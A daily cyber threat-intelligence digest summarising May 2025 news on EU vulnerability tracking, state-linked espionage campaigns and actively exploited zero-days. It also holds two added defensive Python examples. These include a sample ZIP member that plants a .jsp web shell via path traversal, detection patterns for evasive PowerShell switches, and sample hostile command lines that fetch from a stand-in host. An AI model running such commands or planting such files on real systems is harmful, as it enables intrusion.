Wednesday, May 14, 2025 // (IG): BB // GITHUB // SN R&D
EU Launches European Vulnerability Database Amid CVE Uncertainty
Bottom Line Up Front (BLUF): The European Union has officially launched the European Vulnerability Database (EUVD), a real-time platform for tracking security vulnerabilities. This move comes amid growing concerns over the future of the U.S.-backed Common Vulnerabilities and Exposures (CVE) system, which has faced budget cuts and reduced public transparency. ENISA operates EUVD and aims to provide streamlined, timely vulnerability disclosures for ICT systems across the EU.
Analyst Comments: With the U.S. CVE program under contract only until March 2026 and CISA halting public vulnerability alerts on its website, the EU is seizing an opportunity to establish a parallel, potentially more responsive system. EUVD’s focus on highlighting actively exploited and critical vulnerabilities with real-time updates may appeal to global organizations frustrated with NVD delays. Over time, this divergence could prompt a broader international shift in how security flaws are coordinated and disclosed.
FROM THE MEDIA: The EUVD, developed by the European Union Agency for Cybersecurity (ENISA), became fully operational on May 13, 2025. It provides three dashboards: one for critical vulnerabilities, one for actively exploited issues, and one showing disclosures coordinated by EU CSIRTs. The system integrates data from public advisories, vendor alerts, and security feeds, and assigns both CVE and EUVD identifiers. This comes as the U.S. CVE program—still managed by MITRE—is grappling with delayed funding, reduced CISA visibility, and internal staffing upheavals. ENISA confirmed ongoing discussions with MITRE about the future of CVE, but is positioning EUVD as a reliable alternative in an increasingly fragmented vulnerability landscape.
READ THE STORY: The Register
Earth Ammit APT Targets Military Drone Supply Chains with Sophisticated Malware in VENOM and TIDRONE Campaigns
Bottom Line Up Front (BLUF): A Chinese-speaking threat group known as Earth Ammit has conducted two multi-wave cyber espionage campaigns—VENOM and TIDRONE—against the drone, satellite, and military supply chains in Taiwan and South Korea. These attacks relied on open-source and custom tools to gain persistent access to high-value downstream targets via compromised upstream vendors.
Analyst Comments: The group’s use of fiber-based evasion techniques and plugin-based modular backdoors like CXCLNT and CLNTEND highlights its ability to remain stealthy while adapting to hardened environments. Given the strategic nature of its targets, particularly in military and drone manufacturing, this activity aligns with China-linked cyber-espionage patterns and raises concerns about embedded surveillance in critical sectors. These operations may also serve broader geopolitical goals related to regional power projection and deterrence.
FROM THE MEDIA: The group initially compromised software and industrial vendors using open-source tools, then escalated to deploying custom malware, including VENFRPC, CXCLNT, and CLNTEND. In VENOM, attackers exploited web server flaws to plant web shells and exfiltrate credentials. In TIDRONE, malware was distributed through compromised ERP vendors, with victims including military satellite providers and defense contractors. Custom backdoors were used to maintain access, escalate privileges, evade EDR tools, and steal data. Researchers observed the group using Dropbox, SMB, and WebSocket channels for C2 communications. Overlapping infrastructure and target profiles suggest a persistent, strategic campaign, possibly linked to the previously known threat actor Dalbit.
READ THE STORY: GBhackers
Trump Administration Kills Biden-Era AI Chip Export Limits, Eyes New Strategy
Bottom Line Up Front (BLUF): The U.S. Commerce Department has officially rescinded the Biden administration’s AI Diffusion Rule, which sought to limit the export of American AI chips to all but select allies. The move removes pending GPU and accelerator sales restrictions but introduces new guidance warning chipmakers about sales to foreign IaaS providers, possibly serving adversarial AI development.
Analyst Comments: While lifting the AI Diffusion Rule may appease American tech giants and prevent market loss to Chinese rivals, it potentially opens new vectors for adversaries to access AI hardware via cloud providers. The updated export rules signal that the Trump administration intends to pursue a more flexible, case-by-case enforcement model rather than sweeping bans. However, critics argue this could create enforcement blind spots, especially around “in-country” chip transfers and third-party cloud access.
FROM THE MEDIA: This set of rules, intended to restrict AI chip exports to non-allied nations and curb indirect access by China, was widely criticized by U.S. tech firms. The Commerce Department cited concerns about innovation, economic burden, and international relations. Simultaneously, new export control guidance was issued, warning U.S. chipmakers and cloud providers about potential legal consequences if their products are used by foreign infrastructure-as-a-service (IaaS) platforms to train AI models for adversarial militaries. The Bureau of Industry and Security (BIS) also clarified that in-country chip transfers and using Huawei's Ascend AI chips—allegedly made using U.S. technology without a license—violate current controls.
READ THE STORY: The Register
Windows WinSock 0-Day Exploited in Active Attacks to Gain SYSTEM Access (CVE-2025-32709)
Bottom Line Up Front (BLUF): A newly disclosed zero-day vulnerability in the Windows Ancillary Function Driver for WinSock (AFD), tracked as CVE-2025-32709, is actively exploited in the wild. The flaw allows local attackers to escalate privileges to SYSTEM level by abusing a use-after-free condition in the AFD.sys driver.
Analyst Comments: Despite its official classification as "Important," the vulnerability's ability to deliver administrative control with minimal interaction makes it a prime target for advanced persistent threats and ransomware operators. The difficulty in detecting this exploit due to its use of legitimate system functions reinforces the need for robust endpoint monitoring, memory forensics, and faster patch adoption cycles—especially in sectors like healthcare and government already facing targeted attacks.
FROM THE MEDIA: The vulnerability, initially detailed on May 13, stems from improper memory management that can be triggered via specially crafted IOCTL requests. Attackers leveraging this issue can gain SYSTEM privileges without requiring user interaction. The exploit has already been detected in attacks against healthcare and government targets, often as part of broader malware campaigns. Microsoft has issued a security update (KB5036899) for Windows 10/11 and Server 2022. Additional mitigations include enabling HVCI, enforcing least privilege, and monitoring AFD-related memory allocations. Experts warn this could start a broader 2025 exploitation wave involving legacy networking drivers.
READ THE STORY: GBhackers
US States Demand WeChat Explain Role in Fentanyl-Linked Money Laundering
Bottom Line Up Front (BLUF): Attorneys general from six U.S. states have formally demanded answers from Tencent’s WeChat over its alleged involvement in facilitating money laundering tied to the fentanyl trade. The states cite evidence that Chinese money brokers and Mexican cartels are using the platform to orchestrate illicit financial operations across U.S. cities.
Analyst Comments: The increasing scrutiny of WeChat reflects broader concerns over the use of encrypted or opaque messaging platforms for transnational criminal activity. Law enforcement's attention to WeChat’s role in currency swaps and laundering operations could trigger future regulatory or platform access restrictions, especially amid geopolitical tensions and digital sovereignty concerns. If Tencent fails to cooperate, WeChat could face legal or operational challenges in the U.S., much like TikTok has under national security scrutiny.
FROM THE MEDIA: The letter alleges that Chinese underground banking systems have been using WeChat to coordinate the laundering of fentanyl trade proceeds, including cash pickups, currency exchanges, and multi-layered transactions. Past legal actions support these claims, including a 2021 conviction and a recent indictment in South Carolina of individuals allegedly using WeChat to launder tens of millions of dollars. Citing a Wall Street Journal report, the letter emphasizes how cartel operatives exchange U.S. cash for Chinese yuan through the app, effectively obscuring the flow of illicit funds.
READ THE STORY: The Record
Commvault Patches CVE-2025-34028 Command Center RCE Vulnerability After Researcher Pushback
Bottom Line Up Front (BLUF): Commvault has patched CVE-2025-34028, a critical path traversal vulnerability in its Command Center product that allowed remote code execution via malicious .jsp files in ZIP archives. Initially, the patch was not available to free-trial users, even as active exploitation was underway, until a security researcher flagged the issue and prompted a policy change.
Analyst Comments: The delayed patch access for unlicensed Commvault users highlights persistent risks tied to tiered security policies, especially when dealing with CVSS 10 vulnerabilities under active attack. While the vendor responded quickly and ultimately extended patch availability to all users, this case underscores the necessity for equitable and timely patch distribution, regardless of licensing status. Attackers often target trial environments, which may be less monitored or isolated. Vendors should ensure their security response mechanisms don’t inadvertently leave trial or cloud-hosted versions exposed.
FROM THE MEDIA: While paying customers received patches promptly, free-trial users were left vulnerable until security researcher Will Dormann discovered that even seemingly patched versions remained exploitable. Dormann identified the issue during testing and directly contacted Commvault, leading to a rapid response and permanent changes in the vendor’s patch distribution policy. Updates are now made available to licensed and unlicensed users simultaneously, with cloud marketplace users able to access fixed versions without delay.
READ THE STORY: The Register
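The Commvault bug above is a path traversal through archive member names: a ZIP entry such as `../../webapps/ROOT/shell.jsp` lands outside the intended extraction directory, where the server will execute it. The following added example (not Commvault's code; the destination path and the blocked extension list are assumptions for the demo) shows the defensive check an upload handler should apply before extracting any archive: resolve each member against the destination and reject anything that escapes it, then refuse server-executable file types even when the path itself is clean.

```python
import io
import os
import zipfile
from pathlib import PurePosixPath


def is_safe_member(name: str, dest: str) -> bool:
    """True only if the archive member resolves to a path strictly under dest."""
    # Absolute paths, drive letters and backslash-rooted names are never acceptable.
    if not name or name.startswith(("/", "\\")) or os.path.splitdrive(name)[0]:
        return False
    parts = PurePosixPath(name.replace("\\", "/")).parts
    # Any '..' segment is rejected outright rather than normalised away.
    if ".." in parts:
        return False
    dest_abs = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest_abs, *parts))
    # realpath() follows symlinks that already exist under dest; it cannot see
    # symlink entries stored inside the archive, which need a separate check.
    return os.path.commonpath([dest_abs, target]) == dest_abs


def classify_archive(zip_bytes: bytes, dest: str,
                     blocked_suffixes=(".jsp", ".jspx")):
    """Split archive members into extractable names and (name, reason) rejections."""
    safe, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if not is_safe_member(name, dest):
                rejected.append((name, "path traversal"))
            elif PurePosixPath(name).suffix.lower() in blocked_suffixes:
                rejected.append((name, "server-executable file type"))
            else:
                safe.append(name)
    return safe, rejected


def build_sample_archive() -> bytes:
    """Constructed sample: one benign report plus two members an attacker would plant."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("reports/summary.txt", "ok")
        zf.writestr("../../webapps/ROOT/shell.jsp", "<% %>")  # escapes dest
        zf.writestr("static/evil.jsp", "<% %>")               # clean path, bad type
    return buf.getvalue()


if __name__ == "__main__":
    ok, bad = classify_archive(build_sample_archive(), "/tmp/cc_upload")
    print("extract:", ok)
    print("reject:", bad)
```

Run the check before calling `extractall()`; do not rely on the ZIP library's own name sanitisation, which varies by language and version.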
North Korean TA406 Hackers Target Ukraine in Strategic Espionage Campaign
Bottom Line Up Front (BLUF): The North Korean APT group TA406, also known as Konni, is actively targeting Ukrainian government entities in a new cyber-espionage campaign. The attacks aim to gather strategic intelligence on Ukraine’s war response and Russia’s military needs, using sophisticated phishing and malware delivery methods to infiltrate systems.
Analyst Comments: The activity suggests Pyongyang is not only supporting Russia militarily but is also deeply invested in analyzing the war's trajectory. TA406 uses multi-stage PowerShell payloads, phishing with decoy documents, and credential harvesting, reflecting an evolving toolkit designed for stealth and persistence. As geopolitical alliances solidify, expect continued surveillance-focused cyber campaigns by DPRK actors to shape foreign policy decisions and secure strategic advantages.
FROM THE MEDIA: Proofpoint researchers detailed how the group used phishing emails impersonating a fictitious think tank fellow to deliver malware via password-protected RAR archives hosted on cloud platforms like MEGA. These archives contain CHM or LNK files, which trigger PowerShell-based reconnaissance scripts once opened. In other cases, TA406 distributed credential phishing emails from ProtonMail accounts mimicking Microsoft alerts to lure victims into revealing login information. The attackers aim to understand Ukraine’s strategic stance on continued resistance and Moscow’s dependency on external military support. TA406’s targeting stands in contrast to Russian operations, which primarily focus on tactical battlefield data.
READ THE STORY: THN // The Record
Intel Spectre Defenses Bypassed Again by ETH Zurich Researchers
Bottom Line Up Front (BLUF): Researchers at ETH Zurich have discovered a new class of Spectre v2 attack, dubbed Branch Privilege Injection (BPI), that bypasses Intel’s existing mitigations like eIBRS and IBPB. The flaw, tracked as CVE-2024-45332, affects all Intel x86 processors since 9th-gen and has been addressed via a new microcode update.
Analyst Comments: Despite years of architectural patches and microcode updates, speculative execution exposes critical race conditions. BPI exploits asynchronous branch predictor updates during privilege transitions, enabling privilege escalation attacks even in fully patched systems. Organizations relying on Intel CPUs—especially in multi-tenant cloud or virtualized environments—should promptly apply the latest microcode updates and continue monitoring for future speculative execution disclosures.
FROM THE MEDIA: ETH Zurich researchers Sandro Rüegge, Johannes Wikner, and Kaveh Razavi have uncovered a critical flaw in Intel CPUs they call Branch Predictor Race Conditions (BPRC), leading to a new Spectre v2 attack vector named Branch Privilege Injection. The exploit allows unprivileged user processes to inject branch predictions misclassified as kernel-level, bypassing eIBRS and IBPB protections. Intel has acknowledged the vulnerability (CVE-2024-45332) and issued a microcode update, stating that the performance impact is negligible. However, researchers report up to 2.7% performance overhead on Alder Lake systems. The flaw could enable attacks from a virtual machine against hypervisors in cloud environments, though the current proof-of-concept targets user-to-kernel privilege escalation.
READ THE STORY: The Register
APT37 Targets Activists with Weaponized LNK Files and Dropbox C2 in 'ToyBox Story' Campaign
Bottom Line Up Front (BLUF): North Korea-linked APT37 (ScarCruft) has launched a spear-phishing campaign dubbed “Operation: ToyBox Story.” The campaign uses weaponized LNK files and Dropbox for command-and-control (C2) operations. The attacks, aimed at activists focused on North Korean issues, deliver the RoKRAT malware through stealthy, fileless techniques.
Analyst Comments: The group's integration of Dropbox, pCloud, and Yandex for encrypted data exfiltration demonstrates an advanced use of "Living off Trusted Sites" (LoTS) tactics to circumvent enterprise defenses. As geopolitical tensions grow, especially with North Korea's increasing visibility in cyber conflicts, these tactics may be replicated by other APTs seeking deniability and stealth. Organizations dealing with North Korea-related issues or human rights should urgently review endpoint controls and block execution of unverified LNK files.
FROM THE MEDIA: These LNK files execute hidden PowerShell commands to drop RoKRAT malware, which gathers detailed system information, captures screenshots, and encrypts data using layered encryption methods (XOR, AES, RSA) for secure transmission to C2 servers. The malware dynamically executes code in memory, complicating detection and forensics. Dropbox tokens tied to Russian Yandex email addresses further obfuscate attribution. The group reused infrastructure and techniques observed in earlier 2025 operations, and analysts detected links to impersonated LinkedIn accounts and VPN obfuscation. Endpoint detection and behavior monitoring are strongly advised.
READ THE STORY: GBhackers // The Record
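Both the TA406 item (CHM and LNK files launching PowerShell reconnaissance) and the APT37 item above (LNK files running hidden PowerShell) share one observable: a PowerShell process whose parent is the shortcut launcher `explorer.exe` or the CHM viewer `hh.exe`, started with evasion switches. The added detection below is illustrative code, not from either report; the event field names are an assumed generic process-creation shape, and the sample events are constructed. It flags such launches while leaving an administrator's normal script run alone.

```python
import ntpath
import re

# explorer.exe is what runs a double-clicked .lnk; hh.exe renders .chm help files.
LAUNCHERS = {"explorer.exe", "hh.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# PowerShell accepts any unambiguous prefix of a switch, so each pattern covers
# the abbreviated forms (-w, -win, -enc, -ep ...) as well as the full names.
PATTERNS = {
    "hidden window": re.compile(r"(?:^|\s)-w\w*\s+hidden", re.I),
    "encoded command": re.compile(r"(?:^|\s)-e(?:c|n\w*)?\s+[A-Za-z0-9+/=]{8,}", re.I),
    "execution policy bypass": re.compile(r"(?:^|\s)-e(?:p|x\w*)\s+bypass", re.I),
}

# Constructed sample events (field names are an assumption, not a product schema).
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -ep bypass -enc SQBFAFgA"},
    {"id": 2, "parent_image": r"C:\Windows\hh.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -NoP -NonI -W Hidden -c "iwr https://example.invalid/a"'},
    {"id": 3, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\inventory.ps1"},
    {"id": 4, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe"},  # user opened a console from the Start menu
]


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def evaluate(event: dict) -> list:
    """Return the reasons an event is suspicious; empty list means benign."""
    if basename(event["image"]) not in SHELLS:
        return []
    reasons = [name for name, pat in PATTERNS.items()
               if pat.search(event["command_line"])]
    parent = basename(event["parent_image"])
    # A shortcut/CHM launcher plus any evasion switch is enough to alert;
    # from other parents, require two switches to keep admin scripts quiet.
    if parent in LAUNCHERS and reasons:
        return [f"launched by {parent}"] + reasons
    if len(reasons) >= 2:
        return reasons
    return []


def scan(events: list) -> list:
    """Return {"id", "reasons"} for every event that evaluate() flags."""
    flagged = []
    for event in events:
        reasons = evaluate(event)
        if reasons:
            flagged.append({"id": event["id"], "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```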
Ivanti Patches EPMM RCE and Auth Bypass Flaws Exploited in Targeted Attacks
Bottom Line Up Front (BLUF): Ivanti has released urgent patches for two vulnerabilities in its Endpoint Manager Mobile (EPMM) product—CVE-2025-4427 (authentication bypass) and CVE-2025-4428 (remote code execution)—that have already been chained together in limited real-world attacks. These flaws affect EPMM on-premise installations and stem from open-source libraries embedded in the software.
Analyst Comments: The presence of RCE in a widely deployed enterprise management tool is alarming, especially as the attack surface increases with supply chain dependencies like third-party libraries. Given the past abuse of such tools by APTs, there is a high likelihood that these vulnerabilities will be further weaponized if not urgently addressed. Organizations relying on EPMM should prioritize patching and reassess exposure through proper segmentation and API gateway protections.
FROM THE MEDIA: These flaws allow remote attackers to bypass authentication and execute arbitrary code. Though the number of known victims is limited, exploitation has been confirmed. Ivanti credits CERT-EU for reporting the bugs and notes that filtering API access using internal ACLs or WAFs can reduce risk. The flaws impact only on-premise EPMM, not cloud-based Ivanti Neurons or other products. Additionally, Ivanti patched a separate critical vulnerability (CVE-2025-22462, CVSS 9.8) in Neurons for ITSM that, while not yet exploited, allows unauthenticated administrative access.
READ THE STORY: THN
Microsoft and Adobe Patch Critical Flaws Amid Active Exploits in May 2025 Patch Tuesday
Bottom Line Up Front (BLUF): Microsoft’s May 2025 Patch Tuesday fixed 78 vulnerabilities, including five actively exploited zero-days affecting Windows systems. Key flaws—CVE-2025-30397, -30400, -32701, -32706, and -32709—enable remote code execution or privilege escalation. Additional high-severity issues were also patched in Azure, Office, and Defender. Adobe and Apple also released extensive updates addressing critical RCEs and vulnerabilities used in targeted attacks.
Analyst Comments: This month’s patch cycle highlights a sustained focus by attackers on privilege escalation and scripting vulnerabilities, particularly within core Windows components like the Desktop Window Manager and Winsock. The simultaneous exploitation of five zero-days illustrates an aggressive threat landscape targeting both endpoint and server environments. Cloud services weren’t spared either—Azure Automation and DevOps platforms were patched for CVSS 10-level flaws. Organizations should prioritize patching the actively exploited Windows vulnerabilities and Azure fixes immediately, followed closely by Office, Defender, and Adobe product patches.
FROM THE MEDIA: Patch Tuesday addressed 78 security flaws, five of which are under active exploitation. These include use-after-free bugs in the Windows Desktop Window Manager (CVE-2025-30400) and Winsock driver (CVE-2025-32709), a scripting engine memory corruption vulnerability (CVE-2025-30397), and two privilege escalation issues in the Common Log File System Driver (CVE-2025-32701 and -32706). Microsoft also patched three critical Azure vulnerabilities, including a CVSS 10-rated authentication bypass in Azure DevOps (CVE-2025-29813). Adobe rolled out updates for Photoshop, Illustrator, ColdFusion, and other creative tools, with multiple critical RCE vulnerabilities. Apple released fixes across iOS, macOS, and Safari, including a CoreAudio zero-day likely linked to spyware attacks.
READ THE STORY: The Register
Kosovo National Extradited to U.S. for Running BlackDB Criminal Marketplace
Bottom Line Up Front (BLUF): Liridon Masurica, a 33-year-old Kosovo citizen accused of operating the illegal marketplace BlackDB.cc, has been extradited to the U.S. He faces multiple charges related to identity theft, credit card fraud, and the sale of stolen account credentials, and a potential sentence of up to 55 years in federal prison.
Analyst Comments: BlackDB.cc is one of many underground marketplaces enabling large-scale identity fraud and financial crime targeting U.S. citizens. While its takedown is a win for law enforcement, the persistence of similar forums highlights the need for proactive monitoring, financial threat intelligence, and tighter international regulatory frameworks to disrupt criminal ecosystems effectively.
FROM THE MEDIA: The platform sold stolen account credentials, credit card data, and personal information, facilitating a wide range of fraud schemes. Masurica was arrested in Kosovo in December 2024, with law enforcement also seizing digital evidence and arresting three others. He appeared in federal court in Tampa, where he will remain in custody pending trial. Masurica could face a maximum of 55 years in prison if convicted on all charges.
READ THE STORY: The Record
Fortinet Patches Actively Exploited Zero-Day RCE Vulnerability in FortiVoice Systems (CVE-2025-32756)
Bottom Line Up Front (BLUF): Fortinet has released urgent patches for a critical zero-day vulnerability, CVE-2025-32756, affecting FortiVoice and other Fortinet enterprise products. The stack-based buffer overflow flaw, rated 9.6 CVSS, allows unauthenticated remote code execution via crafted HTTP requests and has already been exploited in the wild.
Analyst Comments: CVE-2025-32756 demonstrates threat actors' increasing sophistication and targeting of enterprise communication infrastructure. Fortinet’s confirmation of in-the-wild exploitation and system log erasure tactics suggests a skilled and stealth-oriented attacker, potentially part of an APT. The vulnerability’s presence across multiple Fortinet product lines heightens the urgency for patching and raises concerns about lateral movement opportunities within enterprise networks. Organizations unable to patch immediately should disable HTTP/HTTPS administrative access and monitor for indicators of compromise tied to the disclosed IPs.
FROM THE MEDIA: The flaw, which affects FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera, stems from a stack-based buffer overflow (CWE-121) and can be triggered by unauthenticated HTTP requests. Fortinet observed the exploit used to scan networks, enable credential logging, and delete crash logs, indicative of sophisticated post-exploitation activity. Affected systems span several firmware versions across product lines, and the company has released security updates with specific version guidance. Fortinet recommends disabling the web interface to mitigate risk if patching is not immediately feasible.
READ THE STORY: THN
Cisco TWAMP Vulnerability (CVE-2025-20154) Enables Remote Reboots of IOS, XE, and XR Devices
Bottom Line Up Front (BLUF): Cisco has disclosed a high-severity vulnerability (CVE-2025-20154) in its IOS, IOS XE, and IOS XR software that allows unauthenticated remote attackers to reboot affected devices via malicious TWAMP control packets. With a CVSS score of 8.6 for IOS and XE systems, the flaw presents a significant denial-of-service (DoS) risk for internet-facing and core infrastructure devices.
Analyst Comments: The ability to remotely crash or reboot core devices without authentication elevates the threat, particularly for enterprise and service provider environments. The lack of available workarounds amplifies the exposure. While IOS XR is less impacted (debug mode only), immediate patching across all affected platforms is essential to avoid service disruptions or exploit chaining with other vulnerabilities.
FROM THE MEDIA: If debugging is enabled, attackers can remotely trigger system reloads in IOS/IOS XE devices or crash diagnostic processes in IOS XR. The vulnerability affects all TWAMP-enabled IOS installations, IOS XE versions from 16.6.1 to 17.2.3 (and others until patched), and specific debug-enabled XR versions. Cisco confirmed no workarounds and advised immediate patching to prevent denial-of-service scenarios in mission-critical environments.
READ THE STORY: GBhackers
Actively Exploited Zero-Day in Windows DWM (CVE-2025-30400) Enables Local Privilege Escalation
Bottom Line Up Front (BLUF): Microsoft has disclosed CVE-2025-30400, a critical zero-day vulnerability in the Windows Desktop Window Manager (DWM) component, which is actively being exploited in the wild. The use-after-free flaw allows attackers with local access to escalate privileges, granting full system control on affected Windows systems.
Analyst Comments: The exploit’s stealth and confirmed active exploitation suggest its use by advanced actors, possibly in targeted attacks. Given DWM's deep integration into the graphical subsystem, exploitation could also allow manipulation of display content and unauthorized persistence. Security teams must prioritize patch deployment, enable anomaly detection on DWM processes, and monitor for suspicious privilege elevation events.
FROM THE MEDIA: Microsoft has released a patch for CVE-2025-30400, a Windows zero-day vulnerability affecting the Desktop Window Manager (DWM). This use-after-free flaw, categorized under CWE-416, allows local attackers with low privileges to execute arbitrary code with elevated rights. Microsoft confirmed active in-the-wild exploitation of this bug before public disclosure, elevating its risk profile. The vulnerability impacts the core graphical component of Windows, posing significant risks for endpoint integrity and user security. The CVSS score of 7.8 reflects its ease of exploitation and potential impact on confidentiality, integrity, and availability. Microsoft recommends immediate patching and heightened monitoring for DWM-related anomalies.
READ THE STORY: GBhackers
Items of interest
China Closes AI Gap with U.S., Raising Stakes in Cybersecurity Arms Race
Bottom Line Up Front (BLUF): According to a report by Recorded Future's Insikt Group, Chinese AI models are now only three to six months behind their U.S. counterparts. This rapid advancement, fueled by government support, open-source development, and industrial espionage, is accelerating the global AI arms race and posing new challenges for cybersecurity professionals. Experts urge defenders to enhance public-private-academic collaboration and adopt AI tools at scale to keep up with adversaries' innovation speed.
Analyst Comments: China’s model of centralized funding, open-source collaboration, and tech adoption may offer insights, although ethical lines—like state-sponsored espionage—must not be crossed. In the West, fragmented efforts and proprietary AI development are slowing defensive innovation. A key takeaway for defenders: collaboration and rapid deployment of AI solutions are not just beneficial but essential to survival in this emerging landscape.
FROM THE MEDIA: Chinese companies like DeepSeek are quickly closing the AI performance gap with U.S. firms, thanks to strong government subsidies, seamless integration between academia and industry, and widespread use of open-source resources. The report also attributes some Chinese advances to cyber espionage campaigns targeting Western AI firms. While the U.S. still leads in private investment and semiconductor technology, cybersecurity experts warn that attackers’ use of large language models (LLMs) is already outpacing defenders. Experts call for urgent improvements in U.S. collaboration models, talent pipelines, and adoption of defensive AI to avoid falling further behind.
READ THE STORY: DR
How China’s DeepSeek Came for Big AI (Video)
FROM THE MEDIA: As US companies pour billions of dollars into advancing artificial intelligence, a little-known Chinese startup has seemingly done the impossible. DeepSeek unveiled a chatbot app that performs as well if not better than those of Silicon Valley giants, and at a fraction of the cost.
'What Has Been The Most Surprising Use Of ChatGPT?': Ted Cruz Questions OpenAI CEO Sam Altman (Video)
FROM THE MEDIA: At Thursday's Senate Commerce Committee hearing, Sen. Ted Cruz (R-TX) questioned OpenAI CEO Sam Altman about ChatGPT, DeepSeek, and a range of other topics.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.